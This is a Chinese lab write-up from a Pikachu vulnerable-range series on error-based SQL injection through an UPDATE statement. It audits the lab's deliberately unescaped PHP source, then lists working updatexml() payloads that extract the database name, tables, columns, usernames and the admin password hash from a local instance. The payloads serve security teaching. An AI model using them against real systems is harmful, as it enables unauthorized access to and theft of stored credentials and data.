pikachu靶场通关笔记22-2 SQL注入05-2-update注入(报错法)

目录

一、SQL注入

二、update注入

三、报错型注入

四、源码分析

1、代码审计

2、渗透思路

五、渗透实战

1、渗透准备

2、获取数据库名database

3、获取表名table

4、获取列名column

5、获取字段


本系列为通过《pikachu靶场通关笔记》的SQL注入关卡(共10关)渗透集合,通过对update注入关卡源码的代码审计找到SQL注入安全风险的真实原因,讲解update注入的原理并进行渗透实践,本文为SQL注入05-2之update注入关卡的渗透部分。

一、SQL注入

SQL 注入是指攻击者会在应用程序的输入字段中插入恶意的 SQL 代码,从而改变原有的 SQL 查询逻辑。通过这种方式,他们能够非法获取、修改或删除数据库中的数据,甚至可能夺取数据库的管理权限。SQL注入攻击的常见场景如下所示,今天我们这篇文章讲的就是第三部分更新注入。

  • 登录表单:在网站的登录页面,用户通常要输入用户名和密码以完成身份验证。若后端代码在处理用户输入时,未对输入内容开展严格的验证工作,而是直接将其拼接到 SQL 查询语句里,那么攻击者就有机会精心构造特殊的输入内容。通过这种方式,他们能够巧妙地绕过正常的登录验证机制,进而非法获取系统的访问权限。
  • 搜索功能:当网站具备搜索功能时,用户输入的搜索关键词会被应用于数据库查询操作。一旦对这些输入关键词的处理不足,比如没有进行严格的验证和过滤,攻击者就可以借助输入特制的关键词,实施 SQL 注入攻击。通过这种攻击手段,他们能够非法获取数据库中的敏感信息,如用户的个人隐私、商业机密等。
  • 数据插入(insert注入)与更新(update注入):在涉及数据插入(例如用户注册新账户)以及数据更新(例如用户修改个人信息)的操作过程中,若系统没有对用户输入的数据进行有效的过滤和严格的验证,攻击者就能够构造恶意的输入内容。这些恶意输入可以对 SQL 语句进行篡改,从而实现修改数据库中数据,非法获取数据库中的敏感信息等目的。

二、update注入

Update 注入是 SQL 注入的一种类型,攻击者针对 SQL 语句中的Update 操作,利用应用程序在处理用户输入时的SQL注入安全风险,构造恶意输入并将其插入到Update 语句里,从而改变原本的更新逻辑,实现非法的数据修改、获取数据库敏感信息,甚至执行系统命令等目的。

三、报错型注入

报错型注入属于 SQL 注入的一种类型,攻击者借助构造特殊的 SQL 语句,让数据库在执行时出现错误,再从错误信息中提取出敏感数据。由于数据库的错误信息常常会包含一些关键的数据,像数据库名、表名、列名以及数据内容等,攻击者就可以利用这些信息来获取数据库的详细情况。

报错型注入是利用数据库函数故意触发错误信息来获取数据的攻击技术,以下是常见的数据库关键报错函数。

函数最大回显长度MySQL版本支持特殊要求
updatexml32字节5.1.5+需要XPath错误触发
extractvalue32字节5.1.5+需要XPath错误触发
floor无限制5.0+需要GROUP BY
exp无限制5.5.5+数值溢出触发

四、源码分析

1、代码审计

打开pikachu靶场的SQL注入-报错型关卡对应的源码sqli_edit.php,具体如下所示。

很明显SQL语句没有对POST方法传入的多个参数进行过滤,存在SQL注入风险,详细注释后的代码如下所示。

<?php
// 调用 connect 函数建立与数据库的连接,并将连接对象赋值给变量 $link
$link = connect();// 调用 check_sqli_session 函数检查用户是否已经登录
// 如果用户未登录,会执行以下操作
if (!check_sqli_session($link)) {// 弹出提示框,提示用户登录后才能进入会员中心echo "<script>alert('登录后才能进入会员中心哦')</script>";// 将用户重定向到登录页面header("location:sqli_login.php");
}// 初始化用于存储 HTML 内容的变量,用于后续显示错误信息
$html1 = '';// 检查是否通过 POST 方法提交了表单
if (isset($_POST['submit'])) {// 检查提交的表单中 sex、phonenum、add 和 email 字段是否不为空if ($_POST['sex'] != null && $_POST['phonenum'] != null && $_POST['add'] != null && $_POST['email'] != null) {// 注释掉的代码,原本的意图是对 POST 数据进行转义处理,防止 SQL 注入// $getdata = escape($link, $_POST);// 未对 POST 数据进行转义处理,直接将其赋值给 $getdata 变量$getdata = $_POST;// 构造一个 SQL 更新语句,根据当前登录用户的用户名更新 member 表中的用户信息$query = "update member set sex='{$getdata['sex']}',phonenum='{$getdata['phonenum']}',address='{$getdata['add']}',email='{$getdata['email']}' where username='{$_SESSION['sqli']['username']}'";// 调用 execute 函数执行构造好的 SQL 更新语句$result = execute($link, $query);// 检查执行更新操作后受影响的行数是否为 1 或者 0// 受影响行数为 1 表示更新成功,为 0 表示没有需要更新的数据if (mysqli_affected_rows($link) == 1 || mysqli_affected_rows($link) == 0) {// 如果更新操作成功或没有需要更新的数据,将用户重定向到会员中心页面header("location:sqli_mem.php");} else {// 如果更新操作失败,将错误提示信息添加到 $html1 变量中$html1 .= '修改失败,请重试';}}
}
?>

这段 PHP 代码实现了会员中心用户信息修改的功能,同时进行了登录验证。具体步骤如下所示。

  • 建立与数据库的连接。
  • 检查用户是否已经登录,如果未登录,弹出提示框并将用户重定向到登录页面。
  • 若用户已登录,当用户通过 POST 方法提交表单时,检查 sexphonenumadd 和 email 字段是否为空。
  • 若字段不为空,构造 SQL 更新语句,根据当前登录用户的用户名更新 member 表中的用户信息。
  • 根据更新操作的结果,将用户重定向到会员中心页面或显示错误提示信息。

然而此代码存在SQL注入安全风险,主要原因是对用户输入的数据未进行任何转义或验证处理。代码中原本注释掉了转义函数调用 $getdata = escape($link, $_POST);,而直接使用 $getdata = $_POST; 将用户输入的数据拼接到 SQL 更新语句中。攻击者可以利用SQL注入安全风险,通过构造特殊的输入内容来改变 SQL 语句的逻辑,从而实现恶意操作。

2、渗透思路

基于代码审计,我们知道SQL居于中传入的参数中sex, phonenum, email, address均为注入点。

update member set sex='{$getdata['sex']}',phonenum='{$getdata['phonenum']}',address='{$getdata['add']}',email='{$getdata['email']}' where username='{$_SESSION['sqli']['username']}'

构造闭合语句:liujiannan01' and updatexml(0, concat(0x7e,database()),1) or ' 如下所示。

五、渗透实战

1、渗透准备

打开靶场SQL注入第五关insert/update型注入,打开后是登录页面,如下所示。

http://127.0.0.1/pikachu/vul/sqli/sqli_iu/sqli_login.php

 输入用户名lucy和密码123456登录,如下所示进入到个人信息的界面。

http://127.0.0.1/pikachu/vul/sqli/sqli_iu/sqli_mem.php

点击“修改个人信息”进入到修改页面,如下所示。

http://127.0.0.1/pikachu/vul/sqli/sqli_iu/sqli_edit.php

此时进入到lucy的个人信息修改页面,可以修改的参数包括需要填写的性别、邮寄、邮箱和住址信息,这与代码审计的分析一致,完整URL地址如下所示。

http://127.0.0.1/pikachu/vul/sqli/sqli_iu/sqli_edit.php

bp开启抓包在注册信息中填写内容,将内容修改为1,2,3,4,如下所示。 

burpsuite抓包,找到这个修改报文,具体信息如下所示,POST方法传参包sex, phonenum, email, address,这与源码分析一致,由于使用POST方法传参,故而我们使用bp进行渗透。

2、获取数据库名database

mooyuan1' and updatexml(0, concat(0x7e,database()),1) or '

再次点击修改,在性别的输入框内输入mooyuan1' and updatexml(0, concat(0x7e,database()),1) or '后点击提交,如下所示。

此时页面提示报错信息,爆出数据库的名称为“pikachu”,具体如下所示。  

此时burpsuite抓包如下所示,将报文发送到repeater,后续通过修改POST内容进行注入。

3、获取表名table

对pikchu数据库中表名进行爆破,注入命令如下所示。

sex=' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')),0) or '&phonenum=2&add=3&email=4&submit=submit

渗透后获取到数据库pikachu表有4个以上的table表,但是第五个没有展示全,只有一个x字符,其他前四个分别为httpinfo, member,message, users,如下所示。

之所以没有展示全是因为update的报错信息最多展示32个字符,出去第一个字符是报错的波浪线以外,也就是说有效的字符只能显示31个。接下来使用right函数显示从右到左31个字符,具体注入命令如下所示 。

sex=' or updatexml(1, concat(0x7e,right((select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),31)),0) or '&phonenum=2&add=3&email=4&submit=submit

点击发送后,展示从右开始31个字符,与上一个图片对比可知最后一个table表为xssblind。

4、获取列名column

对pikchu数据库中users表中的列名进行爆破,注入命令如下所示。

sex=' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='pikachu'
)),0) or '&phonenum=2&add=3&email=4&submit=submit

渗透后获取到数据库users表有4个column列,分别为id,username,password,level,如下所示。 

5、获取字段

对pikachu数据库中users表的username列进行爆破,命令如下所示。

sex=' or updatexml(1,concat(0x7e,(select group_concat(username) from users)),0) or '&phonenum=2&add=3&email=4&submit=submit

渗透后获取到数据库users表的username字段如下所示,渗透成功。  

接下来获取admin账户的密码,注入命令如下所示但是没有显示完全,如下所示。 

sex=' or updatexml(1,concat(0x7e,(select group_concat(password) from users where username='admin')),0) or '&phonenum=2&add=3&email=4&submit=submit

我们通过substr函数获取admin账户的密码的第32位开始的31个字符串,注入命令如下所示显示了一个字符e,拼接后即可获取到admin的密码,e10adc3949ba59abbe56e057f20f883e,如下所示。  

sex=' or updatexml(1,concat(0x7e,substr((select group_concat(concat(password)) from users where username='admin'),32,31)),1)  or '&phonenum=2&add=3&email=4&submit=submit

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.pswp.cn/pingmian/84451.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【prometheus+Grafana篇】基于Prometheus+Grafana实现Redis数据库的监控与可视化

&#x1f4ab;《博主主页》&#xff1a; &#x1f50e; CSDN主页 &#x1f50e; IF Club社区主页 &#x1f525;《擅长领域》&#xff1a;擅长阿里云AnalyticDB for MySQL(分布式数据仓库)、Oracle、MySQL、Linux、prometheus监控&#xff1b;并对SQLserver、NoSQL(MongoDB)有了…

R语言速释制剂QBD解决方案之四

本文是《Quality by Design for ANDAs: An Example for Immediate-Release Dosage Forms》速释制剂混合和润滑工艺研究的R语言解决方案。 原料粒径分布与混合次数对混合均一性的影响 由于acetriptan 的溶解度低&#xff0c;acetriptan 需要粉碎以提高生物利用度。粉碎后的原料…

用python玩转大语言模型——从 RNN 到文本生成大语言模型的奇幻之旅

用python玩转大语言模型——从 RNN 到文本生成大语言模型的奇幻之旅 第一部分:RNN原理及其结构(魔法师的记忆水晶球) 1.1 经典RNN结构(时光旅行者的备忘录) 核心概念 时间循环:RNN通过隐藏状态h在时间步之间传递信息,形成闭环结构参数共享:每个时间步使用相同的权重…

数据结构(9)排序

一、常见排序算法 排序在生活中无处不在&#xff0c;上学这么多年班级排名啥的总有吧&#xff0c;不可能一次都没见过&#xff1b;打游戏有的排行榜不也是有排序的思想在里面&#xff0c;排序倒不是什么特殊的数据结构&#xff0c;但是是非常重要的算法思想&#xff0c;所以在初…

量子计算导论课程设计 之 PennyLane环境搭建

文章目录 具体配置conda 虚拟环境配置Pennylane 正所谓&#xff0c;磨刀不误砍柴工&#xff0c;想要进行量子计算导论的课程设计&#xff0c;首先就是搭建好平台&#xff0c;推荐大家就是本地搭建&#xff0c;那么下面有三种选择 QiskitTensorFlow QuantumPennylane 具体配置…

nginx ./nginx -s reload 不生效

问题 nginx ./nginx -s reload 不生效 解决 不是改opt/nginx下的配置文件是改/usr/local/nginx下的配置文件改之前做好备份

建造者模式深度解析与实战应用

作者简介 我是摘星&#xff0c;一名全栈开发者&#xff0c;专注 Java后端开发、AI工程化 与 云计算架构 领域&#xff0c;擅长Python技术栈。热衷于探索前沿技术&#xff0c;包括大模型应用、云原生解决方案及自动化工具开发。日常深耕技术实践&#xff0c;乐于分享实战经验与…

VScode - 我的常用插件01 - 主题插件Noctis

导言 Noctis 是一款为 Visual Studio Code 提供的主题插件&#xff0c;主打高对比度、护眼、美观。它有多种配色风格&#xff0c;适合不同的开发者审美和工作场景。 一、安装Noctis 二、设置颜色主题 三、测试主题 如上所示&#xff0c;有11种主题背景可以选择。这里&#xff…

【IQA技术专题】图像质量评价IQA技术和应用综述(万字长文!!)

专题介绍 图像质量评价&#xff08;Image Quality Assessment, IQA&#xff09;是图像处理、计算机视觉和多媒体通信等领域的关键技术之一。IQA不仅被用于学术研究&#xff0c;更在影像相关行业内实现了完整的商业化应用&#xff0c;涉及影视、智能手机、专业相机、安防监控、…

突然虚拟机磁盘只剩下几十K

第一步&#xff1a;查找哪些文件大于 100M find / -size 100M 第二步&#xff1a;删除掉无用的 log 发现&#xff0c;磁盘剩余空间并没有变大 假如一个文件正在被使用&#xff0c;你删除之后也是不会释放存储空间的。需要关闭相应的服务才能释放。

黑马教程强化day2-1

目录 一、Set集合1.Set集合特点2.Set集合分类3.hashSet底层原理&#xff1a;(基于哈希表存储数据的&#xff09;代码演示 5.hashSet集合元素的去重操作&#xff08;有些情况搞不动&#xff09;代码演示 6.LinkedHashSet的底层原理&#xff08;不常用&#xff0c;所以没有代码演…

【实习总结】C++ 通过pugi::xml库对xml文件进行操作

目录 相关背景 pugi::xml简概 将配置信息写入xml文件 读取xml文件中的配置信息 相关背景 当我们需要将某些配置信息写入项目目录下的xml文件&#xff0c;或者再程序启动时&#xff0c;加载项目下已有的的配置信息&#xff08;.xml&#xff09;&#xff0c;此时&#xff0c;我…

Linux文件回收机制:安全删除文件不怕误删

Linux文件回收机制&#xff1a;安全删除文件不怕误删 文章目录 Linux文件回收机制&#xff1a;安全删除文件不怕误删一、Linux默认没有“回收站”&#xff1f;二、打造你自己的Linux回收站1. 建立回收站目录2. 创建软删除命令remove3. 定时清理回收站4. 替换rm命令5. 完整脚本 …

数据结构排序

目录 1、插入排序 2、希尔排序 3、堆排序 4、直接选择排序 5、快排 6、归并排序 补&#xff1a;计数排序 1、插入排序 void InsertSort(int* arr, int n) {int i 0;for (int i 0; i 1 < n; i){int end i;int tmp arr[end 1];while (end > 0){if (arr[end] &…

Spring声明式事务生效是有条件滴!

在日常工作中&#xff0c;经常使用Transactional 注解进行事务的声明&#xff0c;但如果发现事务未生效&#xff0c;可以从下面几个方面进行排查。 常见失效场景总结 场景原因解决方案内部方法调用绕过了Spring代理注入自身或使用AopContextprivate方法AOP无法增强改为public方…

Code Composer Studio快捷键

文本编辑 编辑、查找、替换功能快捷键 功能快捷键撤销CutZ重做CutY剪切CtrlX复制CtrlC粘贴CtrlV删除Delete全选CtrlA代码块选中AltShiftA查找、替换Ctrl F查找下一个匹配的字符串CtrlK查找上一个匹配的字符串CtrlShiftK查看接口注释&#xff08;文档&#xff09;F2查看函数帮…

从认识AI开始-----生成对抗网络(GAN):通过博弈机制,引导生成

前言 生成对抗网络&#xff08;GAN&#xff09;是lan J. Goodfellow团队在2014年提出的生成架构&#xff0c; 该架构自诞生起&#xff0c;就产生了很多的话题&#xff0c;更是被称为生成对抗网络是“新世纪以来机器学习领域内最有趣的想法”。如今&#xff0c;基于生成对抗网络…

限流算法java实现

参考教程&#xff1a;2小时吃透4种分布式限流算法 1.计数器限流 public class CounterLimiter {// 开始时间private static long startTime System.currentTimeMillis();// 时间间隔&#xff0c;单位为msprivate long interval 1000L;// 限制访问次数private int limitCount…

Maven 构建性能优化深度剖析:原理、策略与实践

&#x1f9d1; 博主简介&#xff1a;CSDN博客专家&#xff0c;历代文学网&#xff08;PC端可以访问&#xff1a;https://literature.sinhy.com/#/?__c1000&#xff0c;移动端可微信小程序搜索“历代文学”&#xff09;总架构师&#xff0c;15年工作经验&#xff0c;精通Java编…

JS手写代码篇---手写深拷贝

17、深拷贝 深拷贝与浅拷贝最大的不同就是对象的属性是嵌套对象&#xff0c;会新建一个对象 步骤&#xff1a; 判断是否为对象判断是否为i数组或者对象&#xff0c;给新的有个容器遍历循环&#xff0c;如果是对象要遍历循环&#xff0c;采用递归 function deepCopy(obj){// …